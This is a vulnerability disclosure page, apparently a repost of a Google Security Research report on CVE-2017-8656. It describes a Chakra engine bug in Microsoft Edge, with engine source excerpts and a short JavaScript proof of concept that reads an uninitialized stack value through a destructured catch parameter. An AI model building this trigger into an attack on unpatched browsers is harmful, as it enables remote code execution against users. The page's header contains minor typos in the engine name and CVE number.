Microsoft Edge Charka PreVisitCatch Missing Call Exploit

🗓️ 17 Aug 2017 00:00:00Reported by Google Security ResearchType

zdt🔗 0day.today👁 40 Views

Microsoft Edge Charka PreVisitCatch doesn't call SetIsCatch for all cases CVE-2017-865

Reporter	Title	Published	Views	Family All 37
BDU FSTEC	The vulnerability in the JavaScript kernel of Microsoft Edge allows a hacker to execute arbitrary code.	25 Aug 201700:00	–	bdu_fstec
Circl	CVE-2017-8656	17 Aug 201700:00	–	circl
CNVD	Microsoft Windows Edge JavaScript Engine Remote Code Execution Vulnerability (CNVD-2017-23798)	9 Aug 201700:00	–	cnvd
Check Point Advisories	Microsoft Edge Scripting Engine Memory Corruption (CVE-2017-8656)	28 Aug 201700:00	–	checkpoint_advisories
CVE	CVE-2017-8656	8 Aug 201721:00	–	cve
Cvelist	CVE-2017-8656	8 Aug 201721:00	–	cvelist
Microsoft KB	August 8, 2017—KB4034658 (OS Build 14393.1593)	8 Aug 201707:00	–	mskb
Microsoft KB	August 8, 2017—KB4034674 (OS Build 15063.540)	8 Aug 201707:00	–	mskb
Kaspersky	KLA11084 Multiple vulnerabilities in Microsoft Edge and Microsoft Internet Explorer	8 Aug 201700:00	–	kaspersky
Microsoft CVE	Scripting Engine Memory Corruption Vulnerability	8 Aug 201707:00	–	mscve

Microsoft Edge: Chakra: PreVisitCatch doesn't call SetIsCatch for all cases 

CVE-2017-8656


function trigger() {
    try {
    } catch (x) {
        var x = 1;
    }

    print(x);
}

trigger();

When Chakra executes the above code, it declares two "x"s. One is only for the catch scope, the other is for the whole function scope. The one for the whole function scope is initialized with undefined at the start of the function. If the bytecode generator incorrectly chooses the "x" to initialize, the "x" for the function scope may remain uninitialized. This choice is made in the following code in "ByteCodeGenerator::DefineUserVars".

void ByteCodeGenerator::DefineUserVars(FuncInfo *funcInfo)
{
    ...
    for (pnode = funcInfo->root->sxFnc.pnodeVars; pnode; pnode = pnode->sxVar.pnodeNext)
    {
        Symbol* sym = pnode->sxVar.sym;

        if (sym != nullptr && !(pnode->sxVar.isBlockScopeFncDeclVar && sym->GetIsBlockVar()))
        {
            if (sym->GetIsCatch() || (pnode->nop == knopVarDecl && sym->GetIsBlockVar()))
            {
                ...
                sym = funcInfo->bodyScope->FindLocalSymbol(sym->GetName()); <<< This returns the symbol for the function scope.
                ...
            }
        }

        // Emit bytecode which initalizes "sym"
    }
    ...
}


However, there's a buggy case that "sym->GetIsCatch()" returns false when it must return true.

Here's a snippet of "PreVisitCatch". This function is supposed to call "SetIsCatch" for all the symbols in the exception parameter. But it doesn't call "SetIsCatch" when the condition "pnode->sxCatch.pnodeParam->nop == knopParamPattern" is satisfied. The PoC reproduces that case, the "x" for the function scope will refer to an uninitialized value in the stack.

void PreVisitCatch(ParseNode *pnode, ByteCodeGenerator *byteCodeGenerator)
{
    // Push the catch scope and add the catch expression to it.
    byteCodeGenerator->StartBindCatch(pnode);
    if (pnode->sxCatch.pnodeParam->nop == knopParamPattern)
    {
        Parser::MapBindIdentifier(pnode->sxCatch.pnodeParam->sxParamPattern.pnode1, [&](ParseNodePtr item)
        {
            Symbol *sym = item->sxVar.sym;
        });
    }
    else
    {
        Symbol *sym = *pnode->sxCatch.pnodeParam->sxPid.symRef;
        sym->SetIsCatch(true);
        pnode->sxCatch.pnodeParam->sxPid.sym = sym;
    }
    ...
}

PoC:
function trigger() {
    try {
    } catch ({x}) {
        var x = 1;
    }

    print(x);
}

trigger();



This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt

#  0day.today [2018-03-05]  #

17 Aug 2017 00:00Current

7.6High risk

Vulners AI Score7.6

EPSS0.81883